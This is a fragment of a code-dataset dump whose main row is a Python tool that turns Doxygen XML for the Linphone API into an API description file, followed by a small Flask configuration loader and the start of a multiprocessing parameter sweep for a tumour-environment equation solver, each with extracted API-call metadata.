self.docparser.parse_description(node.find('./briefdescription'))\n\t\te.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))\n\t\tenumvalues = node.findall(\"enumvalue[@prot='public']\")\n\t\tfor enumvalue in enumvalues:\n\t\t\tev = self.__parseCEnumValue(enumvalue)\n\t\t\te.addValue(ev)\n\t\treturn e\n\n\tdef __findCEnum(self, tree):\n\t\tmemberdefs = tree.findall(\"./compounddef[@kind='group']/sectiondef[@kind='enum']/memberdef[@kind='enum'][@prot='public']\")\n\t\tfor m in memberdefs:\n\t\t\te = self.__parseCEnumMemberdef(m)\n\t\t\tself.add(e)\n\n\tdef __parseCStructMember(self, node, structname):\n\t\tname = node.find('./name').text\n\t\tdefinition = node.find('./definition').text\n\t\tt = definition[0:definition.find(structname + \"::\" + name)]\n\t\tsm = CStructMember(name, t)\n\t\tdeprecatedNode = node.find(\".//xrefsect[xreftitle='Deprecated']\")\n\t\tif deprecatedNode is not None:\n\t\t\tsm.deprecated = True\n\t\tsm.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()\n\t\tsm.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))\n\t\tsm.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))\n\t\treturn sm\n\n\tdef __parseCStructCompounddef(self, node):\n\t\ts = CStruct(node.find('./compoundname').text)\n\t\tdeprecatedNode = node.find(\".//xrefsect[xreftitle='Deprecated']\")\n\t\tif deprecatedNode is not None:\n\t\t\ts.deprecated = True\n\t\ts.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()\n\t\ts.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))\n\t\ts.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))\n\t\tstructmembers = node.findall(\"sectiondef/memberdef[@kind='variable'][@prot='public']\")\n\t\tfor structmember in structmembers:\n\t\t\tsm = self.__parseCStructMember(structmember, s.name)\n\t\t\ts.addMember(sm)\n\t\treturn s\n\n\tdef __findCStruct(self, tree):\n\t\tcompounddefs = tree.findall(\"./compounddef[@kind='struct'][@prot='public']\")\n\t\tfor c in compounddefs:\n\t\t\ts = self.__parseCStructCompounddef(c)\n\t\t\tself.add(s)\n\n\tdef __parseCTypedefMemberdef(self, node):\n\t\tif not Project.__canBeWrapped(self, node):\n\t\t\treturn None\n\t\tname = node.find('./name').text\n\t\tdefinition = node.find('./definition').text\n\t\tif definition.startswith('typedef '):\n\t\t\tdefinition = definition[8 :]\n\t\tif name.endswith('Cb'):\n\t\t\tpos = definition.find(\"(*\")\n\t\t\tif pos == -1:\n\t\t\t\treturn None\n\t\t\treturntype = definition[0:pos].strip()\n\t\t\treturnarg = CArgument(returntype, enums = self.enums, structs = self.__structs)\n\t\t\treturndesc = node.find(\"./detaileddescription/para/simplesect[@kind='return']\")\n\t\t\tif returndesc is not None:\n\t\t\t\tif returnarg.ctype == 'MSList' or returnarg.ctype == 'bctbx_list_t':\n\t\t\t\t\tn = returndesc.find('.//bctbxlist')\n\t\t\t\t\tif n is not None:\n\t\t\t\t\t\treturnarg.containedType = n.text\n\t\t\t\treturnarg.description = self.__cleanDescription(returndesc)\n\t\t\telif returnarg.completeType != 'void':\n\t\t\t\tmissingDocWarning += \"\\tReturn value is not documented\\n\"\n\t\t\tdefinition = definition[pos + 2 :]\n\t\t\tpos = definition.find(\"(\")\n\t\t\tdefinition = definition[pos + 1 : -1]\n\t\t\targslist = CArgumentsList()\n\t\t\tfor argdef in definition.split(', '):\n\t\t\t\targType = ''\n\t\t\t\tstarPos = argdef.rfind('*')\n\t\t\t\tspacePos = argdef.rfind(' ')\n\t\t\t\tif starPos != -1:\n\t\t\t\t\targType = argdef[0 : starPos + 1]\n\t\t\t\t\targName = argdef[starPos + 1 :]\n\t\t\t\telif spacePos != -1:\n\t\t\t\t\targType = argdef[0 : spacePos]\n\t\t\t\t\targName = argdef[spacePos + 1 :]\n\t\t\t\targslist.addArgument(CArgument(argType, argName, self.enums, self.__structs))\n\t\t\tif len(argslist) > 0:\n\t\t\t\tparamdescs = node.findall(\"detaileddescription/para/parameterlist[@kind='param']/parameteritem\")\n\t\t\t\tif paramdescs:\n\t\t\t\t\tfor arg in argslist.arguments:\n\t\t\t\t\t\tfor paramdesc in paramdescs:\n\t\t\t\t\t\t\tif arg.name == paramdesc.find('./parameternamelist').find('./parametername').text:\n\t\t\t\t\t\t\t\targ.description = self.__cleanDescription(paramdesc.find('./parameterdescription'))\n\t\t\t\t\tmissingDocWarning = ''\n\t\t\t\t\tfor arg in argslist.arguments:\n\t\t\t\t\t\tif arg.description == None:\n\t\t\t\t\t\t\tmissingDocWarning += \"\\t'\" + arg.name + \"' parameter not documented\\n\";\n\t\t\t\t\tif missingDocWarning != '':\n\t\t\t\t\t\tprint(name + \":\\n\" + missingDocWarning)\n\t\t\tf = CEvent(name, returnarg, argslist)\n\t\t\tdeprecatedNode = node.find(\".//xrefsect[xreftitle='Deprecated']\")\n\t\t\tif deprecatedNode is not None:\n\t\t\t\tf.deprecated = True\n\t\t\tf.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()\n\t\t\tf.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))\n\t\t\tf.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))\n\t\t\treturn f\n\t\telse:\n\t\t\tpos = definition.rfind(\" \" + name)\n\t\t\tif pos != -1:\n\t\t\t\tdefinition = definition[0 : pos]\n\t\t\ttd = CTypedef(name, definition)\n\t\t\tdeprecatedNode = node.find(\".//xrefsect[xreftitle='Deprecated']\")\n\t\t\tif deprecatedNode is not None:\n\t\t\t\ttd.deprecated = True\n\t\t\ttd.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()\n\t\t\ttd.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))\n\t\t\ttd.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))\n\t\t\treturn td\n\t\treturn None\n\n\tdef __findCTypedef(self, tree):\n\t\tmemberdefs = tree.findall(\"./compounddef[@kind='group']/sectiondef[@kind='typedef']/memberdef[@kind='typedef'][@prot='public']\")\n\t\tfor m in memberdefs:\n\t\t\ttd = self.__parseCTypedefMemberdef(m)\n\t\t\tself.add(td)\n\n\tdef __parseCFunctionMemberdef(self, node):\n\t\tif not Project.__canBeWrapped(self, node):\n\t\t\treturn None\n\t\tinternal = node.find(\"./detaileddescription/internal\")\n\t\tif internal is not None:\n\t\t\treturn None\n\t\tmissingDocWarning = ''\n\t\tname = node.find('./name').text\n\t\tt = ''.join(node.find('./type').itertext())\n\t\treturnarg = CArgument(t, enums = self.enums, structs = self.__structs)\n\t\treturndesc = node.find(\"./detaileddescription/para/simplesect[@kind='return']\")\n\t\tif returndesc is not None:\n\t\t\tif returnarg.ctype == 'MSList' or returnarg.ctype == 'bctbx_list_t':\n\t\t\t\tn = returndesc.find('.//bctbxlist')\n\t\t\t\tif n is not None:\n\t\t\t\t\treturnarg.containedType = n.text\n\t\t\treturnarg.description = self.__cleanDescription(returndesc)\n\t\telif returnarg.completeType != 'void':\n\t\t\tmissingDocWarning += \"\\tReturn value is not documented\\n\"\n\t\targslist = CArgumentsList()\n\t\targslistNode = node.findall('./param')\n\t\tfor argNode in argslistNode:\n\t\t\targType = ''.join(argNode.find('./type').itertext())\n\t\t\targName = ''\n\t\t\targNameNode = argNode.find('./declname')\n\t\t\tif argNameNode is not None:\n\t\t\t\targName = ''.join(argNameNode.itertext())\n\t\t\tif argType != 'void':\n\t\t\t\targslist.addArgument(CArgument(argType, argName, self.enums, self.__structs))\n\t\tif len(argslist) > 0:\n\t\t\tparamdescs = node.findall(\"./detaileddescription/para/parameterlist[@kind='param']/parameteritem\")\n\t\t\tif paramdescs:\n\t\t\t\tfor arg in argslist.arguments:\n\t\t\t\t\tfor paramdesc in paramdescs:\n\t\t\t\t\t\tif arg.name == paramdesc.find('./parameternamelist').find('./parametername').text:\n\t\t\t\t\t\t\tif arg.ctype == 'MSList' or arg.ctype == 'bctbx_list_t':\n\t\t\t\t\t\t\t\tn = paramdesc.find('.//bctbxlist')\n\t\t\t\t\t\t\t\tif n is not None:\n\t\t\t\t\t\t\t\t\targ.containedType = n.text\n\t\t\t\t\t\t\targ.description = self.__cleanDescription(paramdesc.find('./parameterdescription'))\n\t\t\t\tmissingDocWarning = ''\n\t\t\t\tfor arg in argslist.arguments:\n\t\t\t\t\tif arg.description == None:\n\t\t\t\t\t\tmissingDocWarning += \"\\t'\" + arg.name + \"' parameter not documented\\n\";\n\t\tf = CFunction(name, returnarg, argslist)\n\t\tdeprecatedNode = node.find(\".//xrefsect[xreftitle='Deprecated']\")\n\t\tif deprecatedNode is not None:\n\t\t\tf.deprecated = True\n\t\tf.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()\n\t\tf.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))\n\t\tf.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))\n\t\tif f.briefDescription == '' and ''.join(f.detailedDescription.itertext()).strip() == '':\n\t\t\treturn None\n\t\tlocationNode = node.find('./location')\n\t\tif locationNode is not None:\n\t\t\tf.location = locationNode.get('file')\n\t\t\tif not f.location.endswith('.h'):\n\t\t\t\tmissingDocWarning += \"\\tNot documented in a header file ('\" + f.location + \"')\\n\";\n\t\tif missingDocWarning != '':\n\t\t\tprint(name + \":\\n\" + missingDocWarning)\n\t\treturn f\n\n\tdef __findCFunction(self, tree):\n\t\tmemberdefs = tree.findall(\"./compounddef[@kind='group']/sectiondef[@kind='func']/memberdef[@kind='function'][@prot='public'][@static='no']\")\n\t\tfor m in memberdefs:\n\t\t\tf = self.__parseCFunctionMemberdef(m)\n\t\t\tif f is not None:\n\t\t\t\tself.add(f)\n\n\tdef initFromFiles(self, xmlfiles):\n\t\ttrees = []\n\t\tfor f in xmlfiles:\n\t\t\ttree = None\n\t\t\ttry:\n\t\t\t\tif self.verbose:\n\t\t\t\t\tprint(\"Parsing XML file: \" + f.name)\n\t\t\t\ttree = ET.parse(f)\n\t\t\texcept ET.ParseError as e:\n\t\t\t\tprint(e)\n\t\t\tif tree is not None:\n\t\t\t\ttrees.append(tree)\n\t\tfor tree in trees:\n\t\t\tself.__findCEnum(tree)\n\t\tfor tree in trees:\n\t\t\tself.__findCStruct(tree)\n\t\tfor tree in trees:\n\t\t\tself.__findCTypedef(tree)\n\t\tfor tree in trees:\n\t\t\tself.__findCFunction(tree)\n\t\tself.__discoverClasses()\n\n\tdef initFromDir(self, xmldir):\n\t\tfiles = [ os.path.join(xmldir, f) for f in os.listdir(xmldir) if (os.path.isfile(os.path.join(xmldir, f)) and f.endswith('.xml')) ]\n\t\tself.initFromFiles(files)\n\n\tdef check(self):\n\t\tfor c in self.classes:\n\t\t\tfor name, p in six.iteritems(c.properties):\n\t\t\t\tif p.getter is None and p.setter is not None:\n\t\t\t\t\tprint(\"Property '\" + name + \"' of class '\" + c.name + \"' has a setter but no getter\")\n\n\nclass Generator:\n\tdef __init__(self, outputfile):\n\t\tself.__outputfile = outputfile\n\n\tdef __generateEnum(self, cenum, enumsNode):\n\t\tenumNodeAttributes = { 'name' : cenum.name, 'deprecated' : str(cenum.deprecated).lower() }\n\t\tif cenum.associatedTypedef is not None:\n\t\t\tenumNodeAttributes['name'] = cenum.associatedTypedef.name\n\t\tenumNode = ET.SubElement(enumsNode, 'enum', enumNodeAttributes)\n\t\tif cenum.briefDescription != '':\n\t\t\tenumBriefDescriptionNode = ET.SubElement(enumNode, 'briefdescription')\n\t\t\tenumBriefDescriptionNode.text = cenum.briefDescription\n\t\tenumNode.append(cenum.detailedDescription)\n\t\tif len(cenum.values) > 0:\n\t\t\tenumValuesNode = ET.SubElement(enumNode, 'values')\n\t\t\tfor value in cenum.values:\n\t\t\t\tenumValuesNodeAttributes = { 'name' : value.name, 'deprecated' : str(value.deprecated).lower() }\n\t\t\t\tvalueNode = ET.SubElement(enumValuesNode, 'value', enumValuesNodeAttributes)\n\t\t\t\tif value.briefDescription != '':\n\t\t\t\t\tvalueBriefDescriptionNode = ET.SubElement(valueNode, 'briefdescription')\n\t\t\t\t\tvalueBriefDescriptionNode.text = value.briefDescription\n\t\t\t\tvalueNode.append(value.detailedDescription)\n\n\tdef __generateFunction(self, parentNode, nodeName, f):\n\t\tfunctionAttributes = { 'name' : f.name, 'deprecated' : str(f.deprecated).lower() }\n\t\tif f.location is not None:\n\t\t\tfunctionAttributes['location'] = f.location\n\t\tfunctionNode = ET.SubElement(parentNode, nodeName, functionAttributes)\n\t\treturnValueAttributes = { 'type' : f.returnArgument.ctype, 'completetype' : f.returnArgument.completeType }\n\t\tif f.returnArgument.containedType is not None:\n\t\t\treturnValueAttributes['containedtype'] = f.returnArgument.containedType\n\t\treturnValueNode = ET.SubElement(functionNode, 'return', returnValueAttributes)\n\t\tif f.returnArgument.description is not None:\n\t\t\treturnValueNode.append(f.returnArgument.description)\n\t\targumentsNode = ET.SubElement(functionNode, 'arguments')\n\t\tfor arg in f.arguments:\n\t\t\targumentNodeAttributes = { 'name' : arg.name, 'type' : arg.ctype, 'completetype' : arg.completeType }\n\t\t\tif arg.containedType is not None:\n\t\t\t\targumentNodeAttributes['containedtype'] = arg.containedType\n\t\t\targumentNode = ET.SubElement(argumentsNode, 'argument', argumentNodeAttributes)\n\t\t\tif arg.description is not None:\n\t\t\t\targumentNode.append(arg.description)\n\t\tif f.briefDescription != '':\n\t\t\tfunctionBriefDescriptionNode = ET.SubElement(functionNode, 'briefdescription')\n\t\t\tfunctionBriefDescriptionNode.text = f.briefDescription\n\t\tfunctionNode.append(f.detailedDescription)\n\n\tdef __generateClass(self, cclass, classesNode):\n\t\t# Do not include classes that contain nothing\n\t\tif len(cclass.events) == 0 and len(cclass.classMethods) == 0 and \\\n\t\t\tlen(cclass.instanceMethods) == 0 and len(cclass.properties) == 0:\n\t\t\treturn\n\t\t# Check the capabilities of the class\n\t\thas_ref_method = False\n\t\thas_unref_method = False\n\t\thas_destroy_method = False\n\t\tfor methodname in cclass.instanceMethods:\n\t\t\tmethodname_without_prefix = methodname.replace(cclass.cFunctionPrefix, '')\n\t\t\tif methodname_without_prefix == 'ref':\n\t\t\t\thas_ref_method = True\n\t\t\telif methodname_without_prefix == 'unref':\n\t\t\t\thas_unref_method = True\n\t\t\telif methodname_without_prefix == 'destroy':\n\t\t\t\thas_destroy_method = True\n\t\trefcountable = False\n\t\tdestroyable = False\n\t\tif has_ref_method and has_unref_method:\n\t\t\trefcountable = True\n\t\tif has_destroy_method:\n\t\t\tdestroyable = True\n\t\tclassNodeAttributes = {\n\t\t\t'name' : cclass.name,\n\t\t\t'cfunctionprefix' : cclass.cFunctionPrefix,\n\t\t\t'deprecated' : str(cclass.deprecated).lower(),\n\t\t\t'refcountable' : str(refcountable).lower(),\n\t\t\t'destroyable' : str(destroyable).lower()\n\t\t}\n\t\t# Generate the XML node for the class\n\t\tclassNode = ET.SubElement(classesNode, 'class', classNodeAttributes)\n\t\tif len(cclass.events) > 0:\n\t\t\teventsNode = ET.SubElement(classNode, 'events')\n\t\t\teventnames = []\n\t\t\tfor eventname in cclass.events:\n\t\t\t\teventnames.append(eventname)\n\t\t\teventnames.sort()\n\t\t\tfor eventname in eventnames:\n\t\t\t\tself.__generateFunction(eventsNode, 'event', cclass.events[eventname])\n\t\tif len(cclass.classMethods) > 0:\n\t\t\tclassMethodsNode = ET.SubElement(classNode, 'classmethods')\n\t\t\tmethodnames = []\n\t\t\tfor methodname in cclass.classMethods:\n\t\t\t\tmethodnames.append(methodname)\n\t\t\tmethodnames.sort()\n\t\t\tfor methodname in methodnames:\n\t\t\t\tself.__generateFunction(classMethodsNode, 'classmethod', cclass.classMethods[methodname])\n\t\tif len(cclass.instanceMethods) > 0:\n\t\t\tinstanceMethodsNode = ET.SubElement(classNode, 'instancemethods')\n\t\t\tmethodnames = []\n\t\t\tfor methodname in cclass.instanceMethods:\n\t\t\t\tmethodnames.append(methodname)\n\t\t\tmethodnames.sort()\n\t\t\tfor methodname in methodnames:\n\t\t\t\tself.__generateFunction(instanceMethodsNode, 'instancemethod', cclass.instanceMethods[methodname])\n\t\tif len(cclass.properties) > 0:\n\t\t\tpropertiesNode = ET.SubElement(classNode, 'properties')\n\t\t\tpropnames = []\n\t\t\tfor propname in cclass.properties:\n\t\t\t\tpropnames.append(propname)\n\t\t\tpropnames.sort()\n\t\t\tfor propname in propnames:\n\t\t\t\tpropertyNodeAttributes = { 'name' : propname }\n\t\t\t\tpropertyNode = ET.SubElement(propertiesNode, 'property', propertyNodeAttributes)\n\t\t\t\tif cclass.properties[propname].getter is not None:\n\t\t\t\t\tself.__generateFunction(propertyNode, 'getter', cclass.properties[propname].getter)\n\t\t\t\tif cclass.properties[propname].setter is not None:\n\t\t\t\t\tself.__generateFunction(propertyNode, 'setter', cclass.properties[propname].setter)\n\t\tif cclass.briefDescription != '':\n\t\t\tclassBriefDescriptionNode = ET.SubElement(classNode, 'briefdescription')\n\t\t\tclassBriefDescriptionNode.text = cclass.briefDescription\n\t\tclassNode.append(cclass.detailedDescription)\n\n\tdef generate(self, project):\n\t\tprint(\"Generating XML document of Linphone API to '\" + self.__outputfile.name + \"'\")\n\t\tapiNode = ET.Element('api')\n\t\tproject.enums.sort(key = lambda e: e.name)\n\t\tif len(project.enums) > 0:\n\t\t\tenumsNode = ET.SubElement(apiNode, 'enums')\n\t\t\tfor cenum in project.enums:\n\t\t\t\tself.__generateEnum(cenum, enumsNode)\n\t\tif len(project.classes) > 0:\n\t\t\tclassesNode = ET.SubElement(apiNode, 'classes')\n\t\t\tproject.classes.sort(key = lambda c: c.name)\n\t\t\tfor cclass in project.classes:\n\t\t\t\tself.__generateClass(cclass, classesNode)\n\t\ts = '\\n'.encode('utf-8')\n\t\ts += ET.tostring(apiNode, 'utf-8')\n\t\tif project.prettyPrint:\n\t\t\ts = minidom.parseString(s).toprettyxml(indent='\\t')\n\t\tself.__outputfile.write(s)\n\n\n\ndef main(argv = None):\n\tif argv is None:\n\t\targv = sys.argv\n\targparser = argparse.ArgumentParser(description=\"Generate XML version of the Linphone API.\")\n\targparser.add_argument('-o', '--outputfile', metavar='outputfile', type=argparse.FileType('w'), help=\"Output XML file describing the Linphone API.\")\n\targparser.add_argument('--verbose', help=\"Increase output verbosity\", action='store_true')\n\targparser.add_argument('--pretty', help=\"XML pretty print\", action='store_true')\n\targparser.add_argument('xmldir', help=\"XML directory generated by doxygen.\")\n\targs = argparser.parse_args()\n\tif args.outputfile == None:\n\t\targs.outputfile = open('api.xml', 'w')\n\tproject = Project()\n\tif args.verbose:\n\t\tproject.verbose = True\n\tif args.pretty:\n\t\tproject.prettyPrint = True\n\tproject.initFromDir(args.xmldir)\n\tproject.check()\n\tgen = Generator(args.outputfile)\n\tgen.generate(project)\n\nif __name__ == \"__main__\":\n\tsys.exit(main())\n"},"apis":{"kind":"list like","value":["argparse.FileType","os.listdir","xml.etree.ElementTree.parse","argparse.ArgumentParser","metadoc.Parser","xml.etree.ElementTree.tostring","os.path.join","xml.etree.ElementTree.Element","xml.dom.minidom.parseString","xml.etree.ElementTree.SubElement","six.iteritems"],"string":"[\n \"argparse.FileType\",\n \"os.listdir\",\n \"xml.etree.ElementTree.parse\",\n \"argparse.ArgumentParser\",\n \"metadoc.Parser\",\n \"xml.etree.ElementTree.tostring\",\n \"os.path.join\",\n \"xml.etree.ElementTree.Element\",\n \"xml.dom.minidom.parseString\",\n \"xml.etree.ElementTree.SubElement\",\n \"six.iteritems\"\n]"},"extract_api":{"kind":"string","value":"[((27754, 27839), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '\"\"\"Generate XML version of the Linphone API.\"\"\"'}), \"(description='Generate XML version of the Linphone API.'\\n )\\n\", (27777, 27839), False, 'import argparse\\n'), ((6873, 6889), 'metadoc.Parser', 'metadoc.Parser', ([], {}), '()\\n', (6887, 6889), False, 'import metadoc\\n'), ((21658, 21710), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['enumsNode', '\"\"\"enum\"\"\"', 'enumNodeAttributes'], {}), \"(enumsNode, 'enum', enumNodeAttributes)\\n\", (21671, 21710), True, 'import xml.etree.ElementTree as ET\\n'), ((22676, 22731), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['parentNode', 'nodeName', 'functionAttributes'], {}), '(parentNode, nodeName, functionAttributes)\\n', (22689, 22731), True, 'import xml.etree.ElementTree as ET\\n'), ((22986, 23046), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['functionNode', '\"\"\"return\"\"\"', 'returnValueAttributes'], {}), \"(functionNode, 'return', returnValueAttributes)\\n\", (22999, 23046), True, 'import xml.etree.ElementTree as ET\\n'), ((23168, 23208), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['functionNode', '\"\"\"arguments\"\"\"'], {}), \"(functionNode, 'arguments')\\n\", (23181, 23208), True, 'import xml.etree.ElementTree as ET\\n'), ((24979, 25035), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classesNode', '\"\"\"class\"\"\"', 'classNodeAttributes'], {}), \"(classesNode, 'class', classNodeAttributes)\\n\", (24992, 25035), True, 'import xml.etree.ElementTree as ET\\n'), ((27044, 27061), 'xml.etree.ElementTree.Element', 'ET.Element', (['\"\"\"api\"\"\"'], {}), \"('api')\\n\", (27054, 27061), True, 'import xml.etree.ElementTree as ET\\n'), ((27539, 27568), 'xml.etree.ElementTree.tostring', 'ET.tostring', (['apiNode', '\"\"\"utf-8\"\"\"'], {}), \"(apiNode, 'utf-8')\\n\", (27550, 27568), True, 'import xml.etree.ElementTree as ET\\n'), ((20936, 20959), 'os.path.join', 'os.path.join', (['xmldir', 'f'], {}), '(xmldir, f)\\n', (20948, 20959), False, 'import os\\n'), ((21148, 21175), 'six.iteritems', 'six.iteritems', (['c.properties'], {}), '(c.properties)\\n', (21161, 21175), False, 'import six\\n'), ((21776, 21819), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['enumNode', '\"\"\"briefdescription\"\"\"'], {}), \"(enumNode, 'briefdescription')\\n\", (21789, 21819), True, 'import xml.etree.ElementTree as ET\\n'), ((21971, 22004), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['enumNode', '\"\"\"values\"\"\"'], {}), \"(enumNode, 'values')\\n\", (21984, 22004), True, 'import xml.etree.ElementTree as ET\\n'), ((23459, 23523), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['argumentsNode', '\"\"\"argument\"\"\"', 'argumentNodeAttributes'], {}), \"(argumentsNode, 'argument', argumentNodeAttributes)\\n\", (23472, 23523), True, 'import xml.etree.ElementTree as ET\\n'), ((23665, 23712), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['functionNode', '\"\"\"briefdescription\"\"\"'], {}), \"(functionNode, 'briefdescription')\\n\", (23678, 23712), True, 'import xml.etree.ElementTree as ET\\n'), ((25081, 25115), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '\"\"\"events\"\"\"'], {}), \"(classNode, 'events')\\n\", (25094, 25115), True, 'import xml.etree.ElementTree as ET\\n'), ((25388, 25428), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '\"\"\"classmethods\"\"\"'], {}), \"(classNode, 'classmethods')\\n\", (25401, 25428), True, 'import xml.etree.ElementTree as ET\\n'), ((25739, 25782), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '\"\"\"instancemethods\"\"\"'], {}), \"(classNode, 'instancemethods')\\n\", (25752, 25782), True, 'import xml.etree.ElementTree as ET\\n'), ((26095, 26133), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '\"\"\"properties\"\"\"'], {}), \"(classNode, 'properties')\\n\", (26108, 26133), True, 'import xml.etree.ElementTree as ET\\n'), ((26762, 26806), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '\"\"\"briefdescription\"\"\"'], {}), \"(classNode, 'briefdescription')\\n\", (26775, 26806), True, 'import xml.etree.ElementTree as ET\\n'), ((27151, 27182), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['apiNode', '\"\"\"enums\"\"\"'], {}), \"(apiNode, 'enums')\\n\", (27164, 27182), True, 'import xml.etree.ElementTree as ET\\n'), ((27304, 27337), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['apiNode', '\"\"\"classes\"\"\"'], {}), \"(apiNode, 'classes')\\n\", (27317, 27337), True, 'import xml.etree.ElementTree as ET\\n'), ((27908, 27930), 'argparse.FileType', 'argparse.FileType', (['\"\"\"w\"\"\"'], {}), \"('w')\\n\", (27925, 27930), False, 'import argparse\\n'), ((20565, 20576), 'xml.etree.ElementTree.parse', 'ET.parse', (['f'], {}), '(f)\\n', (20573, 20576), True, 'import xml.etree.ElementTree as ET\\n'), ((20969, 20987), 'os.listdir', 'os.listdir', (['xmldir'], {}), '(xmldir)\\n', (20979, 20987), False, 'import os\\n'), ((22152, 22216), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['enumValuesNode', '\"\"\"value\"\"\"', 'enumValuesNodeAttributes'], {}), \"(enumValuesNode, 'value', enumValuesNodeAttributes)\\n\", (22165, 22216), True, 'import xml.etree.ElementTree as ET\\n'), ((26341, 26406), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['propertiesNode', '\"\"\"property\"\"\"', 'propertyNodeAttributes'], {}), \"(propertiesNode, 'property', propertyNodeAttributes)\\n\", (26354, 26406), True, 'import xml.etree.ElementTree as ET\\n'), ((22287, 22331), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['valueNode', '\"\"\"briefdescription\"\"\"'], {}), \"(valueNode, 'briefdescription')\\n\", (22300, 22331), True, 'import xml.etree.ElementTree as ET\\n'), ((27602, 27624), 'xml.dom.minidom.parseString', 'minidom.parseString', (['s'], {}), '(s)\\n', (27621, 27624), True, 'import xml.dom.minidom as minidom\\n'), ((21007, 21030), 'os.path.join', 'os.path.join', (['xmldir', 'f'], {}), '(xmldir, f)\\n', (21019, 21030), False, 'import os\\n')]"}}},{"rowIdx":715,"cells":{"code":{"kind":"string","value":"import configparser\nimport os\n\n\n\n\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\ndir_path += '/cfg.ini'\n\nclass Configuration(object):\n def __init__(self,debug=False):\n section = \"Flask-debug\" if debug else \"Flask\"\n \n cfg = configparser.ConfigParser()\n cfg.read(dir_path if debug else \"/var/www/html/flaskApp/cfg.ini\")\n self.debug = cfg.getboolean(section, \"DEBUG\")\n self.csrf_enabled = cfg.getboolean(section,\"CSRF_ENABLED\")\n self.threads_per_page = cfg.getint(section,\"THREADS_PER_PAGE\")\n self.port = cfg.getint(section,\"PORT\")\n self.host = cfg.get(section,\"HOST\")\n"},"apis":{"kind":"list like","value":["os.path.realpath","configparser.ConfigParser"],"string":"[\n \"os.path.realpath\",\n \"configparser.ConfigParser\"\n]"},"extract_api":{"kind":"string","value":"[((62, 88), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\\n', (78, 88), False, 'import os\\n'), ((256, 283), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\\n', (281, 283), False, 'import configparser\\n')]"}}},{"rowIdx":716,"cells":{"code":{"kind":"string","value":"from multiprocessing import Pool\nimport EnvEq as ee\nimport numpy as np\nimport itertools as it\nimport os\n\n#parsing input into numpy arrays\nfrom input import *\ny0=np.array([y0_Tpos,y0_Tpro,y0_Tneg,y0_o2,y0_test])\np=np.array([p_o2,p_test])\nmu=np.array([[mu_o2Tpos,mu_o2Tpro,mu_o2Tneg],[mu_testTpos,mu_testTpro,0]])\nlam=np.array([lam_o2,lam_test])\nt_D=np.array([t_DTpos,t_DTpro,t_DTneg])\nr=np.array([r_Tpos,r_Tpro,r_Tneg])\ndelta=np.array([delta_Tpos,delta_Tpro,delta_Tneg])\nrho=np.array([rho_Tpos,rho_Tpro,rho_Tneg])\nlim=np.array([[[l_lim_o2Tpos,u_lim_o2Tpos],[l_lim_o2Tpro,u_lim_o2Tpro],[l_lim_o2Tneg,u_lim_o2Tneg]],[[l_lim_testTpos,u_lim_testTpos],[l_lim_testTpro,u_lim_testTpro],[0,0]]],dtype=np.float64)\n\n#make directories for saving raw_outputs\ntry:\n os.makedirs(\"../../raw_output/EnvEq/\"+f_name)\nexcept:\n pass\n\n#iterator over these \no2_lim_arr=np.empty([0,2])\nfor ulim_Tpro in np.arange(0.1,1,0.2):\n for ulim_Tneg in np.arange(0.1,1,0.2):\n o2_lim_arr=np.append(o2_lim_arr,[[ulim_Tpro,ulim_Tneg]],axis=0)\n\n\ndef solve_parm(u_lim_o2): #calls the solve_eq function with all default inputs other than o2_lim\n f_name_i=f_name+\"{:.1f}\".format(u_lim_o2[0])+\"-\"+\"{:.1f}\".format(u_lim_o2[1])\n lim[0,1,1]=u_lim_o2[0]\n lim[0,2,1]=u_lim_o2[1]\n ee.solve_eq(t_max,dt,y0,p,mu,lam,r,K,delta,rho,lim,f_name_i)\n\nif __name__ == '__main__':\n pool = Pool(4)\n pool.map(solve_parm,o2_lim_arr) #iterate over the o2_lims\n pool.close()\n pool.join()\n"},"apis":{"kind":"list like","value":["EnvEq.solve_eq","os.makedirs","numpy.append","numpy.array","numpy.empty","multiprocessing.Pool","numpy.arange"],"string":"[\n \"EnvEq.solve_eq\",\n \"os.makedirs\",\n \"numpy.append\",\n \"numpy.array\",\n \"numpy.empty\",\n \"multiprocessing.Pool\",\n \"numpy.arange\"\n]"},"extract_api":{"kind":"string","value":"[((161, 214), 'numpy.array', 'np.array', (['[y0_Tpos, y0_Tpro, y0_Tneg, y0_o2, y0_test]'], {}), '([y0_Tpos, y0_Tpro, y0_Tneg, y0_o2, y0_test])\\n', (169, 214), True, 'import 